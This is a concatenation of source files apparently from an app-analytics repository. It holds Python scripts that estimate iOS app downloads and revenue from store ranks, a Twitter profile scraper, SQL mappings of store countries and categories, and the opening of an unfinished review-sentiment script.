estimates['store_id'] = np.int64(estimates['store_id'])
actuals['store_id'] = np.int64(actuals['store_id'])
estimates = reshape_to_ranks(estimates)
estimates = estimates.merge(actuals, on=['app_id', 'date', 'store_id'])
estimates['sum_estimate'] = estimates['estimate_iphone'] + estimates['estimate_ipad']
estimates['rel_error'] = (estimates['units'] - estimates['sum_estimate']).abs() / estimates['units']
estimates['iphone_ratio'] = (1.0*estimates['estimate_iphone']) / estimates['sum_estimate']
estimates['ipad_ratio'] = 1.0 - estimates['iphone_ratio']
estimates = estimates[estimates['estimate_iphone']>0]
estimates = estimates[estimates['estimate_ipad']>0]
estimates = estimates[estimates['rel_error']<0.05].drop_duplicates()
estimates = estimates.reindex_axis(['app_id', 'date', 'store_id', 'category_id', 'feed_id', 'unit', 'rank_iphone', 'rank_ipad', 'estimate_iphone', 'estimate_ipad', 'sum_estimate', 'units', 'rel_error', 'iphone_ratio', 'ipad_ratio'], axis=1)
#estimates.to_csv('shaped_estimates.csv', index=False)
#plot_ratios(estimates, month)
models = train_models(estimates, algorithm)
with open('%s_models_%s.pk'%(algo_name, month), 'wb') as output:
pickle.dump(models, output, pickle.HIGHEST_PROTOCOL)
#plot_error_by_category(estimates)
#plot_count_by_error(estimates)
#gen_reg_models(estimates).to_csv('reg_models_%s.csv'%(month), index=False)
<file_sep>/audience/twitter-scraping/lib/__init__.py
__author__ = 'hgriffioen'
<file_sep>/ranking_change/correlations_plotter.py
#!/usr/bin/env python
import pandas as pd
import os
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import datetime as dt
import config
import matplotlib.cm as cm
from itertools import cycle
import numpy as np
import gc
overall_categories = ['Overall',
'Games',
'Business',
'Weather',
'Utilities',
'Travel',
'Sports',
'Social Networking',
'Reference',
'Productivity',
'Photo and Video',
'News',
'Navigation',
'Music',
'Lifestyle',
'Health and Fitness',
'Finance',
'Entertainment',
'Education',
'Books',
'Medical',
'Newsstand',
'Food and Drink']
games_categories = ['Overall',
'Games',
'Action',
'Adventure',
'Arcade',
'Board',
'Card',
'Casino',
'Dice',
'Educational',
'Family',
'Kids',
'Music',
'Puzzle',
'Racing',
'Role Playing',
'Simulation',
#'Sports',
'Strategy',
'Trivia',
'Word']
def add_f_date(df):
df2 = df[['date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['date']]
df = df.merge(df2, on='date')
return df
def plot_multi_category_correlations(df, name='overall'):
gdf = df.groupby(['Country', 'Market', 'Type', 'value_type', 'rank_limit'])
for n,g in gdf:
gc.collect()
fn = 'plots/corr_multi/correlation_%s_%s.png'%(name, '_'.join(map(str, n)))
plt.clf()
fig = plt.figure(figsize=(36,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['corr'], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
plt.gcf().autofmt_xdate()
ax.grid()
ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
plt.savefig(fn)
plt.close()
#plt.show()
def plot_correlations(df):
for n, g in df.groupby(['Country', 'Market', 'Type', 'Category', 'value_type', 'rank_limit']):
gc.collect()
fn = 'plots/corr_single/correlation_%s.png'%('_'.join(map(str, n)))
print fn
if os.path.exists(fn):
continue
plt.clf()
#fig = plt.figure()
#fig = plt.figure(figsize=(36,12))
fig = plt.figure(figsize=(int(len(g['date'])/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['f_date'].values, g['corr'], linewidth=3)
plt.gcf().autofmt_xdate()
ax.grid()
plt.ylim(-1.0, -0.4)
plt.title(str(n))
plt.savefig(fn)
plt.close()
#@profile
def main():
df = pd.read_csv('/Users/perezrafael/appannie/data/corr-results-1378781934.9.csv')
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['store_id']
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df['Type'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
df['Market'] = df['feed_id'].apply(lambda x: config.IOS_MARKETS_DICT[x])
del df['feed_id']
df = df[df['rank_transform_name']=='log']
del df['rank_transform_name']
df = df[df['value_transform_name']=='log']
del df['value_transform_name']
df = df[df['rank_limit']==300]
df = df[df['Category']!='Sports']
#df = df[df['Country']=='United Kingdom']
df = add_f_date(df)
plot_multi_category_correlations(df[df['Category'].isin(overall_categories)], 'overall')
plot_multi_category_correlations(df[df['Category'].isin(games_categories)], 'games')
plot_correlations(df)
if __name__ == '__main__':
main()
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/spiders/twitter.py
import pandas as pd
import scrapy
from ..constants import FIELD_PATHS
from ..items import ScraperItem
from scrapy.shell import inspect_response
from scrapy import Request
class TwitterSpider(scrapy.Spider):
"""
Spider for scraping Twitter profiles. Gets user handles from scraping from the file reviewers.csv. Specify a
different field using the option -a filename=example_file.csv.
Examples:
- scrapy crawl twitter -a filename=test.csv -o output_test.csv
"""
name = "twitter"
allowed_domains = ["twitter.com"]
base_url = 'https://twitter.com/'
start_urls = ()
def __init__(self, filename='reviewers.csv', *args, **kwargs):
df = pd.read_csv(filename, index_col=False)
self.reviewers = df.reviewer.tolist()
def start_requests(self):
"""
Generate requests from the list of reviewers.
:return: Request objects
"""
for reviewer in self.reviewers:
yield Request(self.base_url + str(reviewer).replace(' ', ''))
def parse(self, response):
"""
Parse the response using the field paths given in constants.FIELD_PATHS.
:param response: Response object
:return: ScraperItem
"""
item = ScraperItem()
for field, path in FIELD_PATHS.iteritems():
field_data = response.xpath(path).extract()
item[field] = field_data[0] if len(field_data) == 1 else ''
yield item<file_sep>/evaluation/py/gen_benchmark_data_ios.py
'''
Created on Oct 18, 2013
@author: perezrafael
'''
import sys
import os
import pandas as pd
import zipfile
import StringIO
import datetime as dt
import matplotlib.dates as mdates
import psycopg2
import matplotlib.cm as cm
import numpy as np
import bz2
import datetime
import config
import itertools
from sklearn.cross_validation import KFold
from scipy import optimize
import bz2
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
#DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=nile'
#DB_EVENTS_STRING = 'dbname=aa user=aa host=nile'
DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=10.38.48.144 port=5432'
DB_EVENTS_STRING = 'dbname=aa user=aa host=10.38.48.134 port=6432'
#COMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
COMPRESSED_RANKING_FILES_PATH = '/mnt/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
OUT_DIR='../data'
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
iphone_ranks = pd.DataFrame({'iphone_rank': np.arange(1, 1001)})
ipad_ranks = pd.DataFrame({'ipad_rank': np.arange(1, 401)})
rank_range_limits = {20: [1, 20],
60: [21, 60],
200: [61, 200],
1000: [201, 10000]}
ipad_feeds = {'100': '1',
'101': '0',
'102': '2'}
reverse_ipad_feeds = {'1': '100',
'0': '101',
'2': '102'}
#@profile
def train_models(df, feed_id, device_rank, other_device_rank, actual_type):
def fitfunc1(p, x):
r = p[0] * (x[:,0] ** p[1])
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
df = df[df['feed_id']==feed_id]
result = []
estimate_name = 'estimate_%s'%actual_type
df = df[df[device_rank]>0]
rank_ranges = [20, 60, 200, 1000]
df['rank_range'] = 20
df['rank_range'][df[device_rank]>20] = 60
df['rank_range'][df[device_rank]>60] = 200
df['rank_range'][df[device_rank]>200] = 1000
for n, g in df.groupby(['store_id', 'category_id', 'feed_id']):
#end_date = datetime.datetime.strptime(n[3], '%Y-%m-%d')
#start_date = end_date - datetime.timedelta(days=7)
#end_date = end_date.strftime('%Y-%m-%d')
#start_date = start_date.strftime('%Y-%m-%d')
#g = df[(df['store_id']==n[0]) & (df['category_id']==n[1]) & (df['feed_id']==n[2]) & (df['date']>start_date) & (df['date']<=end_date)]
print n, g.shape
if g.shape[0]<10:
continue
if device_rank == 'iphone_rank':
test0 = iphone_ranks.copy()
else:
test0 = ipad_ranks.copy()
train0 = g.reset_index()
del train0['index']
app_ids = g[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
test_out = []
for tr, te in kf:
test = train0[(train0['app_id'].isin(app_ids.loc[te]['app_id'])) & (train0['date']==train0['date'].max())]
train = train0[train0['app_id'].isin(app_ids.loc[tr]['app_id'])]
train = train[np.isnan(train[other_device_rank])==True]
train = train[train[actual_type]>0]
train = train[np.isnan(train['has_event_flag'])==True]
p0 = [1.0, 1.0, 1.0, 1.0]
#p1 = np.array([2.20083025e+05, -6.19775339e-01, 1.00000000e+00, 1.00000000e+00])
for rank_range in rank_ranges:
tt = train[train['rank_range']==rank_range]
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(tt[[device_rank]].values, tt[actual_type].values), factor=0.1, maxfev=100000)
except Exception, e:
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[[device_rank]].values, train[actual_type].values), factor=0.1, maxfev=100000)
except:
print estimate_name, rank_range, train.shape, e
print tt
t = test[test['rank_range']==rank_range]
t[estimate_name] = fitfunc1(p1, t[[device_rank]].values)
t = t[[device_rank, estimate_name, 'date']]
test_out.append(t)
test_out = pd.concat(test_out)
g = g.merge(test_out, on=[device_rank, 'date'])
del g['rank_range']
result.append(g)
result = pd.concat(result)
return result
def load_ranks_csv_zip(path):
filehandle = open(path, 'rb')
zfile = zipfile.ZipFile(filehandle)
data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
df = pd.read_csv(data)
return df
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
iphone_dfs = []
ipad_dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
df['rank'] += 1
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
if int(feed_id) < 100:
df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
iphone_dfs.append(df)
df['feed_id'] = feed_id
else:
df.rename(columns={'rank': 'ipad_rank'}, inplace=True)
ipad_dfs.append(df)
df['feed_id'] = ipad_feeds[feed_id]
f.close()
iphone_dfs = pd.concat(iphone_dfs)
ipad_dfs = pd.concat(ipad_dfs)
iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
#print iphone_dfs
#print ipad_dfs
return iphone_dfs.merge(ipad_dfs, on=['app_id', 'date', 'store_id', 'category_id', 'feed_id'], how='outer')
def read_actuals(date, store_id, value_type, table_name, ranked_apps=None):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
if ranked_apps is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s AND app_id = ANY(%%s)' % (value_type, table_name)
params = (date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, table_name: value}
cur.close()
def read_events(date, store_id, ranked_apps=None):
conn = get_connection(DB_EVENTS_STRING)
cur = conn.cursor()
event = 2
if ranked_apps is None:
sql = 'SELECT app_id, type from aa_event WHERE type = %s AND date(date) = %s AND store_id = %s'
params = (event, date, store_id)
else:
sql = 'SELECT app_id, type from aa_event WHERE type = %s AND date(date) = %s AND store_id = %s AND app_id = ANY(%s)'
params = (event, date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, type in cur:
yield {'app_id': app_id, 'type': type}
cur.close()
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
def get_actuals(store_ids, DATES, table_name, value_type, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_actuals(single_date, int(store_id), value_type, table_name, ranked_apps)))
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def get_events(store_ids, DATES, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_events(single_date, int(store_id), ranked_apps)))
if df.shape[0]<1:
df = pd.DataFrame(columns=['app_id', 'date', 'store_id', 'type'])
del df['type']
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def process_single_country(store_id, DATES):
global CONN
path = COMPRESSED_RANKING_FILES_PATH
category_ids = map(str, config.IOS_CATEGORIES_DICT.keys())
#category_ids = ['36']
ranks_df = []
for single_date in DATES:
file = '%s/ranking_%s.sql.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, [store_id], category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
ranked_apps = list(map(int, ranks_df['app_id'].drop_duplicates().values))
CONN = None
downloads_df = get_actuals([store_id], DATES, 'downloads', 'units', ranked_apps)
sales_df = get_actuals([store_id], DATES, 'sales', 'revenue', ranked_apps)
actuals_df = pd.merge(downloads_df, sales_df, on=['date', 'app_id', 'store_id'], how='outer')
del sales_df
del downloads_df
df = pd.merge(actuals_df, ranks_df, on=['app_id', 'date', 'store_id'], how='outer')
#print df
del ranks_df
del actuals_df
CONN = None
events_df = get_events([store_id], DATES, ranked_apps)
events_df['has_event_flag'] = 1
#events_df.set_index(['app_id', 'date', 'store_id'], inplace=True)
#df.set_index(['app_id', 'date', 'store_id'], inplace=True)
#df = df.drop(events_df.index)
df = df.merge(events_df, on=['app_id', 'date', 'store_id'], how='outer')
del events_df
del ranked_apps
#df.reset_index(inplace=True)
device_ranks = ['iphone_rank', 'ipad_rank']
feed_actual_types = [['0', 'downloads'],
['1', 'downloads'],
['2', 'sales']]
iphone_estimates = []
for feed_id, actual_type in feed_actual_types:
r = train_models(df, feed_id, device_ranks[0], device_ranks[1], actual_type)
iphone_estimates.append(r)
iphone_estimates = pd.concat(iphone_estimates)
iphone_estimates['actual'] = iphone_estimates['downloads']
iphone_estimates['actual'][iphone_estimates['feed_id']=='2'] = iphone_estimates['sales']
iphone_estimates['iphone_estimate'] = iphone_estimates['estimate_downloads']
iphone_estimates['iphone_estimate'][iphone_estimates['feed_id']=='2'] = iphone_estimates['estimate_sales']
del iphone_estimates['downloads']
del iphone_estimates['sales']
del iphone_estimates['estimate_downloads']
del iphone_estimates['estimate_sales']
del iphone_estimates['ipad_rank']
ipad_estimates = []
for feed_id, actual_type in feed_actual_types:
r = train_models(df, feed_id, device_ranks[1], device_ranks[0], actual_type)
ipad_estimates.append(r)
ipad_estimates = pd.concat(ipad_estimates)
ipad_estimates['actual'] = ipad_estimates['downloads']
ipad_estimates['actual'][ipad_estimates['feed_id']=='2'] = ipad_estimates['sales']
ipad_estimates['ipad_estimate'] = ipad_estimates['estimate_downloads']
ipad_estimates['ipad_estimate'][ipad_estimates['feed_id']=='2'] = ipad_estimates['estimate_sales']
del ipad_estimates['downloads']
del ipad_estimates['sales']
del ipad_estimates['estimate_downloads']
del ipad_estimates['estimate_sales']
del ipad_estimates['iphone_rank']
del ipad_estimates['has_event_flag']
all_estimates = pd.merge(iphone_estimates, ipad_estimates, on=['store_id', 'category_id', 'feed_id', 'date', 'app_id', 'actual'], how='outer')
del iphone_estimates
del ipad_estimates
all_estimates.sort(['store_id', 'category_id', 'feed_id', 'date', 'iphone_rank', 'ipad_rank'], inplace=True)
all_estimates.to_csv('%s/benchmark_data_%s_%s.csv'%(OUT_DIR, store_id, DATES[-1]),index=False)
def main():
store_ids = ['143441',
'143465',
#'143466',
'143462',
'143444'
]
store_ids = ['143441']
store_ids = map(str, config.IOS_STORES_DICT.keys())
DATES = daterange(start_date, end_date)
print DATES
for store_id, date in itertools.product(store_ids, DATES):
end_date2 = date + datetime.timedelta(days=1)
start_date2 = date - datetime.timedelta(days=6)
dates = daterange(start_date2, end_date2)
print store_id, dates
out_file = '%s/benchmark_data_%s_%s.csv'%(OUT_DIR, store_id, dates[-1])
out_file_bz2 = '%s/benchmark_data_%s_%s.csv.bz2'%(OUT_DIR, store_id, dates[-1])
print out_file
if os.path.isfile(out_file) or os.path.isfile(out_file_bz2):
continue
try:
process_single_country(store_id, dates)
except Exception as e:
print e, store_id, date
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/ios/1000h1-create_appannie_distimo_mappings.sql
/*
Create (hard-coded) mappings between App Annie and Distimo tables.
*/
/* Mappings between feed and (device, type) */
drop table if exists aa_benchmarking_ios.feed_device_type_mappings;
create table aa_benchmarking_ios.feed_device_type_mappings(
feed int unsigned not null,
feed_name varchar(20) not null,
device_id TINYINT unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
constraint primary key (feed),
index(device_id, type));
insert into aa_benchmarking_ios.feed_device_type_mappings
(feed, feed_name, device_id, type)
values
(0, "IPHONE_FREE", 1, 'free'),
(1, "IPHONE_PAID", 1, 'paid'),
(2, "IPHONE_GROSSING", 1, 'gross'),
(100, "IPAD_PAID", 2, 'paid'),
(101, "IPAD_FREE", 2, 'free'),
(102, "IPAD_GROSS", 2, 'gross');
/* Country mappings using names. */
drop temporary table if exists temp.aa_countries;
create temporary table temp.aa_countries (
id int,
name varchar(40)) ;
insert into temp.aa_countries
(id, name)
values
(143441, 'United States'),
(143442, 'France'),
(143443, 'Germany'),
(143444, 'United Kingdom'),
(143445, 'Austria'),
(143446, 'Belgium'),
(143447, 'Finland'),
(143448, 'Greece'),
(143449, 'Ireland'),
(143450, 'Italy'),
(143451, 'Luxembourg'),
(143452, 'Netherlands'),
(143453, 'Portugal'),
(143454, 'Spain'),
(143455, 'Canada'),
(143456, 'Sweden'),
(143457, 'Norway'),
(143458, 'Denmark'),
(143459, 'Switzerland'),
(143460, 'Australia'),
(143461, 'New Zealand'),
(143462, 'Japan'),
(143463, 'Hong Kong'),
(143464, 'Singapore'),
(143465, 'China'),
(143466, 'South Korea'),
(143467, 'India'),
(143468, 'Mexico'),
(143469, 'Russia'),
(143470, 'Taiwan'),
(143471, 'Vietnam'),
(143472, 'South Africa'),
(143473, 'Malaysia'),
(143474, 'Philippines'),
(143475, 'Thailand'),
(143476, 'Indonesia'),
(143477, 'Pakistan'),
(143478, 'Poland'),
(143479, 'Saudi Arabia'),
(143480, 'Turkey'),
(143481, 'United Arab Emirates'),
(143482, 'Hungary'),
(143483, 'Chile'),
(143485, 'Panama'),
(143486, 'Sri Lanka'),
(143487, 'Romania'),
(143489, 'Czech Republic'),
(143491, 'Israel'),
(143493, 'Kuwait'),
(143494, 'Croatia'),
(143495, '<NAME>'),
(143496, 'Slovakia'),
(143497, 'Lebanon'),
(143498, 'Qatar'),
(143499, 'Slovenia'),
(143501, 'Colombia'),
(143502, 'Venezuela'),
(143503, 'Brazil'),
(143504, 'Guatemala'),
(143505, 'Argentina'),
(143506, 'El Salvador'),
(143507, 'Per'),
(143508, 'Dominican Republic'),
(143509, 'Ecuador'),
(143510, 'Honduras'),
(143511, 'Jamaica'),
(143512, 'Nicaragua'),
(143513, 'Paraguay'),
(143514, 'Uruguay'),
(143515, 'Maca'),
(143516, 'Egypt'),
(143517, 'Kazakhstan'),
(143518, 'Estonia'),
(143519, 'Latvia'),
(143520, 'Lithuania'),
(143521, 'Malta'),
(143523, 'Moldova'),
(143524, 'Armenia'),
(143525, 'Botswana'),
(143526, 'Bulgaria'),
(143528, 'Jordan'),
(143529, 'Kenya'),
(143530, 'Macedonia'),
(143531, 'Madagascar'),
(143532, 'Mali'),
(143533, 'Mauritius'),
(143534, 'Niger'),
(143535, 'Senegal'),
(143536, 'Tunisia'),
(143537, 'Uganda'),
(143538, 'Anguilla'),
(143539, 'Bahamas'),
(143540, 'Antigua and Barbuda'),
(143541, 'Barbados'),
(143542, 'Bermuda'),
(143543, 'British Virgin Islands'),
(143544, 'Cayman Islands'),
(143545, 'Dominica'),
(143546, 'Grenada'),
(143547, 'Montserrat'),
(143548, 'St. Kitts and Nevis'),
(143549, 'St. Lucia'),
(143550, 'St. Vincent and The Grenadines'),
(143551, 'Trinidad and Tobago'),
(143552, 'Turks and Caicos'),
(143553, 'Guyana'),
(143554, 'Suriname'),
(143555, 'Belize'),
(143556, 'Bolivia'),
(143557, 'Cyprus'),
(143558, 'Iceland'),
(143559, 'Bahrain'),
(143560, 'Brunei'),
(143561, 'Nigeria'),
(143562, 'Oman'),
(143563, 'Algeria'),
(143564, 'Angola'),
(143565, 'Belarus'),
(143566, 'Uzbekistan'),
(143568, 'Azerbaijan'),
(143571, 'Yemen'),
(143572, 'Tanzania'),
(143573, 'Ghana'),
(143575, 'Albania'),
(143576, 'Benin'),
(143577, 'Bhutan'),
(143578, 'Burkina Faso'),
(143579, 'Cambodia'),
(143580, '<NAME>'),
(143581, 'Chad'),
(143582, 'Congo'),
(143583, 'Fiji'),
(143584, 'Gambia'),
(143585, 'Guinea-Bissa'),
(143586, 'Kyrgyzstan'),
(143587, 'Laos'),
(143588, 'Liberia'),
(143589, 'Malawi'),
(143590, 'Mauritania'),
(143591, 'Micronesia'),
(143592, 'Mongolia'),
(143593, 'Mozambique'),
(143594, 'Namibia'),
(143484, 'Nepal'),
(143595, 'Pala'),
(143597, 'Papua New Guinea'),
(143598, 'Sao Tome and Principe'),
(143599, 'Seychelles'),
(143600, 'Sierra Leone'),
(143601, 'Solomon Islands'),
(143602, 'Swaziland'),
(143603, 'Tajikistan'),
(143604, 'Turkmenistan'),
(143492, 'Ukraine'),
(143605, 'Zimbabwe');
drop table if exists aa_benchmarking_ios.country_mappings;
create table aa_benchmarking_ios.country_mappings (
`store_id` int unsigned NOT NULL,
`appannie_name` varchar(48) NOT NULL,
`iso_code` varchar(2) NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(48) NOT NULL,
constraint primary key(store_id),
index(country_id),
index(iso_code)
)
select
aa_cn.id as store_id,
aa_cn.name as appannie_name,
cn.iso_code,
cn.id as country_id,
cn.name as distimo_name
from
generic.countries cn
join temp.aa_countries aa_cn
using(name)
join appstore.countries cn
using(iso_code)
;
/* Category mappings using similar names. */
drop temporary table if exists temp.aa_categories;
create temporary table temp.aa_categories
(id int, name varchar(40)) ;
insert into temp.aa_categories
(id, name)
values
(36, 'Overall'),
(100, 'Applications'),
(6000, 'Business'),
(6001, 'Weather'),
(6002, 'Utilities'),
(6003, 'Travel'),
(6004, 'Sports'),
(6005, 'Social Networking'),
(6006, 'Reference'),
(6007, 'Productivity'),
(6008, 'Photo and Video'),
(6009, 'News'),
(6010, 'Navigation'),
(6011, 'Music'),
(6012, 'Lifestyle'),
(6013, 'Health and Fitness'),
(6014, 'Games'),
(6015, 'Finance'),
(6016, 'Entertainment'),
(6017, 'Education'),
(6018, 'Books'),
(6020, 'Medical'),
(6021, 'Newsstand'),
(6022, 'Catalogs'),
(6023, 'Food and Drink'),
(7001, 'Games Action'),
(7002, 'Games Adventure'),
(7003, 'Games Arcade'),
(7004, 'Games Board'),
(7005, 'Games Card'),
(7006, 'Games Casino'),
(7007, 'Games Dice'),
(7008, 'Games Education'),
(7009, 'Games Family'),
(7010, 'Games Kids'),
(7011, 'Games Music'),
(7012, 'Games Puzzle'),
(7013, 'Games Racing'),
(7014, 'Games Role Playing'),
(7015, 'Games Simulation'),
(7016, 'Games Sports'),
(7017, 'Games Strategy'),
(7018, 'Games Trivia'),
(7019, 'Games Word'),
(360, 'Kids'),
(361, 'Kids 5 & Under'),
(362, 'Kids Ages 6-8'),
(363, 'Kids Ages 9-11');
drop table if exists aa_benchmarking_ios.category_mappings;
create table aa_benchmarking_ios.category_mappings (
`appannie_category_id` smallint(5) unsigned NOT NULL,
`appannie_name` varchar(80) NOT NULL,
`distimo_category_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(80) NOT NULL,
constraint primary key (appannie_category_id, distimo_category_id),
index(distimo_category_id, appannie_category_id))
select
aa_cg.id as appannie_category_id,
aa_cg.name as appannie_name,
cg.id as distimo_category_id,
cg.name as distimo_name
from
appstore.categories cg
join (
SELECT
DISTINCT category_id
FROM
temp.rankings
) x
ON cg.id = x.category_id
join temp.aa_categories aa_cg
ON (
cg.name = aa_cg.name
OR REPLACE(cg.name, '-', ' ') = aa_cg.name
OR REPLACE(cg.name, '&', 'and') = aa_cg.name
OR REPLACE(cg.name, '-Educational', ' Education') = aa_cg.name
OR cg.name = CONCAT('Top ', aa_cg.name)
OR cg.name = CONCAT('All ', aa_cg.name)
)
;<file_sep>/review-sentiment-analysis/lib/sentiment_get_word_weights_rewrite.py
"""
!!! NOTE: STILL WORK IN PROCESS, DOES NOT WORK YET !!!
"""
"""
This script classifies reviews into topics defined in SEED_TERMS,
then aggreagtes per app.
@param PHASE: The phase of the script to run from scratch.
Each phase acts as a checkpoint, if the run is stoped it can be resumed from the most recently finished phase.
1 - run
0 - don't run
@param DATA_DIR: All data will be read from this directory
@reviews_file: Name of the file containing raw reviews in csv format
id,app_id,store_id,rating,date,title,version,text,reviewer,userreview_id
@JOBS: total of cores to run on parallel, 1 means single core processing
@PARALLEL_CHUNK_SIZE: total rows to process in each JOB,
more rows will reduce process switching and running time but increase memory usage.
@MIN_N: Minimum size of ngrams, 2 is optimal already
@MAX_N: Maximum size of ngrams, 2 is optimal.
@SEED_TERMS: dictionary where keys are topics and values are lists of seed words.
@return: Percentage of reviews agggregated by topic and app.
@note: Params are hard-coded here after the imports
"""
import cPickle
import gc
import itertools
import nltk.data
import numpy as np
import os
import pandas as pd
import random
import re
import string
from constants import DATA_DIR, reviews_file, SOME_FIXED_SEED, DELIMITER, JOBS, PARALLEL_CHUNK_SIZE, MIN_N, MAX_N
from copy import copy, deepcopy
from gensim import corpora
from joblib import Parallel, delayed, Memory
from nltk.tokenize import wordpunct_tokenize
from nltk.corpus import stopwords
from os import listdir
from os.path import isfile, join
from tempfile import mkdtemp
from corpora import CONTRACTIONS, SEED_TERMS
"""
For each phase description look at the comments bellow
"""
PHASE = {0: 1,
1: 1,
2: 1,
3: 1,
4: 1,
5: 1,
6: 1,
7: 1,
8: 1,
9: 1}
reviews_path = '{}/{}'.format(DATA_DIR, reviews_file)
np.random.seed(SOME_FIXED_SEED)
TMP_DIR = '{}/tmp'.format(DATA_DIR)
cachedir = mkdtemp()
memory = Memory(cachedir=cachedir, verbose=0)
MEM_FOLDER = '{}/shm'.format(DATA_DIR)
def clean_temporary_directory(temp_dir=TMP_DIR):
for the_file in os.listdir(temp_dir):
file_path = os.path.join(temp_dir, the_file)
try:
os.unlink(file_path)
except Exception, e:
print e
def get_corpora(seed_terms=SEED_TERMS):
stop_words = _get_stopwords(seed_terms)
main_topics, sentiment_topics = _get_topics(seed_terms)
control_doc = _get_control_doc(seed_terms)
return stop_words, main_topics, sentiment_topics, control_doc
def _get_stopwords(seed_terms):
stop_words = stopwords.words('english')
for v in seed_terms.values():
for w in v:
if w in stop_words:
stop_words.remove(w)
return stop_words
def _get_topics(seed_terms):
sentiment_topics = ['positive', 'negative']
main_topics = seed_terms.keys()
for sentiment in sentiment_topics:
